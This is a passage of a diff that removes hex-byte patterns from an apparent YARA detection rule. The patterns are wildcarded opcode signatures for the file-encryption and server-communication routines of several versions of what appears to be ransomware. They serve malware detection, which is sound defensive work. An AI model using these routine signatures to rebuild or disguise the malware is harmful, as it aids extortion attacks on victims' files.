-            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 59 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 75 3A 8D 7C 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 2C 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 1E 68 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 74 0C 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? 8D 4C 24 ?? 51 57 FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 7D FC FF FF 57 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$encrypt_file_0_2_6a_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 33 C0 56 8B B4 24 ?? ?? ?? ?? 57 33 FF 68 ?? ??
-            ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 84
-            24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ??
-            ?? 8D 84 24 ?? ?? ?? ?? 57 50 89 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
-            ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52
-            E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 1A 57 56
-            FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 89 7C 24 ?? 75 21 56 FF 15 ?? ?? ?? ?? 5F 83 C8 ?? 5E 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ??
-            ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 81 FF ?? ?? ?? ?? 77 D7 53 55 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 94 24 ?? ??
-            ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 8B D7 83 E2 ?? BB ?? ?? ?? ?? 2B DA 89 8C 24
-        }
-		$encrypt_file_0_2_6a_2 = {
-            8B 8C 24 ?? ?? ?? ?? 03 FB 57 89 84 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B E8 83 C4 ?? 85 ED 74 3C
-            8B 4C 24 ?? 6A ?? 8D 44 24 ?? 50 51 55 56 FF 15 ?? ?? ?? ?? 85 C0 74 24 8B 44 24 ?? 3B 44 24 ?? 75 1A 53 8D 14 28 53 52
-            E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 0F 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 D5 00 00 00 8D 44 24 ?? 50
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 52 57 53 55 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ??
-            56 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 54 24 ?? 52 6A ??
-            8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 57 53 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 74 24 ?? 8D
-            94 24 ?? ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 74 0F 56 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05
-            ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 55 11 05 ?? ?? ?? ?? 01 3D ?? ?? ?? ?? 11 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ??
-            83 C4 ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5D 5B 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$encrypt_file_0_3_1 = {
-            53 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 94 24
-            ?? ?? ?? ?? 8B D5 83 E2 ?? BF ?? ?? ?? ?? 2B FA 89 8C 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8D 1C 2F 53 89 84 24 ?? ?? ??
-            ?? 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 89 44 24 ?? 74 38 6A ?? 8D 4C 24 ?? 51 55 50 56 FF 15 ?? ?? ?? ??
-            85 C0 74 24 3B 6C 24 ?? 75 1E 57 57 8B 7C 24 ?? 8D 14 2F 52 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B E8 83 C4 ?? 85 ED 75 0F
-            56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 0F 01 00 00 8D 44 24 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 24 ?? ??
-            ?? ?? 52 53 55 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50
-            6A ?? 8D 8C 24 ?? ?? ?? ?? 51 56 FF D7 6A ?? 8D 54 24 ?? 52 6A ?? 8D 44 24 ?? 50 56 FF D7 6A ?? 8D 4C 24 ?? 51 53 55 56
-            FF D7 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 F6 8D 9B ?? ?? ?? ?? 8B 44 24 ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 50 FF 15
-            ?? ?? ?? ?? 85 C0 75 27 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 0E 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A ?? FF D7 83
-            C6 ?? 83 FE ?? 7C C0 A1 ?? ?? ?? ?? 33 F6 3B C6 74 13 8B 54 24 ?? 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 ??
-            ?? ?? ?? ?? 8B 44 24 ?? 50 11 35 ?? ?? ?? ?? 01 1D ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 83 C4
-            ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5B 5D 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$encrypt_file_0_3_3_1 = {
-            55 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 89 94 24
-            ?? ?? ?? ?? 8B D3 83 E2 ?? BD ?? ?? ?? ?? 2B EA 89 84 24 ?? ?? ?? ?? 8D 04 2B 89 8C 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ??
-            50 89 8C 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 0A 01 00 00 6A ?? 8D 44 24 ?? 50 53 57 56
-            FF 15 ?? ?? ?? ?? 85 C0 75 18 56 FF 15 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? E9 98 01 00 00 3B 5C 24 ?? 75 1E
-            55 8D 0C 1F 55 51 E8 ?? ?? ?? ?? 8B 6C 24 ?? 55 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 18 57 E8 ?? ?? ?? ?? 83 C4 ?? 56
-            FF 15 ?? ?? ?? ?? 83 C8 ?? E9 5C 01 00 00 8D 54 24 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ??
-            ?? 51 55 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A ?? 8D 54 24 ?? 52 6A
-            ?? 8D 84 24 ?? ?? ?? ?? 50 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 39 6A ?? 8D 4C 24 ?? 51 6A ?? 8D 54 24 ?? 52 56 C7
-            44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 1C 8B 4C 24 ?? 6A ?? 8D 44 24 ?? 50 51 53 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 75
-            1E 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 AB 00 00 00 56 FF 15 ?? ?? ?? ?? 56 FF
-        }
-		$encrypt_file_0_3_3_2 = {
-            15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 33 F6 8D 49 ?? 8B 44 24 ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0 75
-            2A FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 0E 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D5 83 C6 ?? 83 FE
-            ?? 7C BD A1 ?? ?? ?? ?? 33 F6 3B C6 74 13 8B 54 24 ?? 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 ?? ?? ?? ?? ??
-            8B 44 24 ?? 57 11 35 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ??
-            ?? ?? 8B 8C 24 ?? ?? ?? ?? 5D 5B 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$encrypt_file_0_3_4a_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 33 C0 56 8B B4 24 ?? ?? ?? ?? 57 33 FF 68 ?? ??
-            ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 84
-            24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ??
-            ?? 8D 84 24 ?? ?? ?? ?? 57 50 89 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
-            ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52
-            E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 57 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 19 5F 0B C0
-            5E 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 53 57 56 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 74 08 81 FB
-            ?? ?? ?? ?? 76 22 56 FF 15 ?? ?? ?? ?? 5B 5F 83 C8 ?? 5E 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-            55 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B
-            C3 83 E0 ?? BD ?? ?? ?? ?? 2B E8 8D 04 2B 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 0A 01 00 00 6A ?? 8D
-            4C 24 ?? 51 53 57 56 FF 15 ?? ?? ?? ?? 85 C0 75 18 56 FF 15 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? E9 99 01 00
-        }
-		$encrypt_file_0_3_4a_2 = {
-            00 3B 5C 24 ?? 75 1E 55 8D 14 1F 55 52 E8 ?? ?? ?? ?? 8B 6C 24 ?? 55 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 18 57 E8 ??
-            ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 5D 01 00 00 8D 44 24 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ??
-            51 8D 94 24 ?? ?? ?? ?? 52 55 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A
-            ?? 8D 44 24 ?? 50 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 39 6A ?? 8D 54 24 ?? 52 6A ??
-            8D 44 24 ?? 50 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 1C 8B 54 24 ?? 6A ?? 8D 4C 24 ?? 51 52 53 56 C7 44 24 ?? ?? ??
-            ?? ?? FF D5 85 C0 75 1E 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 AC 00 00 00 56 FF
-            15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 33 F6 8D 64 24 ?? 8B 4C 24 ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 51 FF
-            15 ?? ?? ?? ?? 85 C0 75 2A FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 0E 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF D5 83 C6 ?? 83 FE ?? 7C BD A1 ?? ?? ?? ?? 33 F6 3B C6 74 13 8B 4C 24 ?? 51 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 83 05 ?? ?? ?? ?? ?? 8B 54 24 ?? 57 11 35 ?? ?? ?? ?? 01 15 ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ??
-            ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5D 5B 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$encrypt_file_0_3_5a_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 33 C0 55 56 57 33 FF 68 ?? ?? ?? ?? 89 84 24
-            ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ??
-            89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? 8B F1 57 50 89 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A
-            ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52
-            E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 57 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 0F 84 D2 00 00
-            00 57 56 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 B8 00 00 00 3B EF 0F 84 B0 00 00 00 81 FD ?? ?? ?? ?? 0F 87 A4 00 00 00
-            8D 4F ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 89 8C 24 ??
-            ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B CD 83 E1 ?? BB ?? ?? ?? ?? 2B D9 89 84 24 ?? ?? ?? ?? 8D 04 2B 50
-            89 94 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 3B 6A ?? 8D 54 24 ?? 52 55 57 56 FF 15 ?? ?? ??
-            ?? 85 C0 75 18 56 FF 15 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? E9 98 01 00 00 3B 6C 24 ?? 74 18 57 E8
-        }
-		$encrypt_file_0_3_5a_2 = {
-            83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 7A 01 00 00 53 8D 04 2F 53 50 E8 ?? ?? ?? ?? 8B 6C 24 ?? 83 C4 ?? 55 E8 ??
-            ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 C7 8D 4C 24 ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50
-            55 57 8B CB E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 6A ??
-            8D 94 24 ?? ?? ?? ?? 52 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 75 0F 57 E8 ?? ?? ?? ?? 83 C4 ?? 53 E9 5E FF FF FF 6A ??
-            8D 44 24 ?? 50 6A ?? 8D 4C 24 ?? 51 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 D4 8B 44 24 ?? 6A ?? 8D 54 24 ?? 52 50 53
-            56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 B8 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 33 F6 EB 09 8D
-            A4 24 ?? ?? ?? ?? 8B FF 8B 54 24 ?? 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 75 2A FF 15 ?? ?? ?? ?? 3D
-            ?? ?? ?? ?? 75 0E 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D5 83 C6 ?? 83 FE ?? 7C BD A1 ?? ?? ?? ??
-            33 F6 3B C6 74 13 8B 4C 24 ?? 51 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 ?? ?? ?? ?? ?? 8B 54 24 ?? 57 11 35 ??
-            ?? ?? ?? 01 15 ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 8B 8C 24
-            ?? ?? ?? ?? 5F 5E 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$server_communication_0_2_6a_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 00 53 33 DB 39 1D ?? ??
-            ?? ?? A3 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 55 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 53 50 88 5C 24 ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 53 89 44 24 ?? 89 44
-            24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ??
-            ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 52
-            50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 44 24 ?? 83 C4 ?? 8D 70 ?? 8A 08 83 C0 ?? 3A CB 75
-            F7 8D 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 51 2B C6 50 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52
-            E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 83
-            C4 ?? 53 53 53 53 52 FF 15 ?? ?? ?? ?? 8B F8 A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 8B 14 85 ?? ?? ?? ?? 51 53 52 FF 15
-        }
-		$server_communication_0_2_6a_2 = {
-            A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 53 53 6A ?? 53 53 68 ?? ?? ?? ?? 51 57 FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ??
-            53 53 53 8D 54 24 ?? 52 8B E8 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B F0 8D 84 24 ?? ?? ?? ?? 53 50 88 9C
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 56 89 5C 24 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
-            ?? ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 C7 05 ?? ?? ?? ?? ??
-            ?? ?? ?? 89 5C 24 ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ??
-            ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 52 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 56 8B 35 ?? ?? ?? ?? FF D6
-        }
-		$server_communication_0_3_1_1 = {
-            8B 0D ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ??
-            ?? ?? 51 8B 0D ?? ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ??
-            ?? 53 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 44 24 ?? 83 C4 ?? 8D 48 ??
-            8A 10 83 C0 ?? 3A D3 75 F7 55 56 57 2B C1 8D 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 51 50 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8D 4C
-            24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8
-            ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 52 FF 15 ?? ?? ?? ?? 8B F8 A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 8B 14
-            85 ?? ?? ?? ?? 51 53 52 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 F8 ?? 53 53 6A ?? 53 53 73 23 8B 04 85 ?? ?? ?? ?? 6A ?? 50
-            57 FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 53 53 53 8D 4C 24 ?? 8B F0 51 EB 24 8B 14 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 57 FF
-            15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 53 53 8B F0 53 8D 44 24 ?? 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C
-        }
-		$server_communication_0_3_1_2 = {
-            24 ?? ?? ?? ?? 53 51 8B E8 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 55 89 5C 24 ?? FF 15 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 54 24 ?? 52 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 8D 8C
-            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 8D 54 24 ?? 68 ??
-            ?? ?? ?? 52 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 5C 24 ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ??
-            ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 4C 24 ?? 51 E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 55 FF D3
-        }
-		$server_communication_0_3_3_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 50 ?? 8A 08 83 C0 ?? 84 C9 75
-            F7 2B C2 75 0D 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 55 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 C6 44 24 ?? ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 33 C0
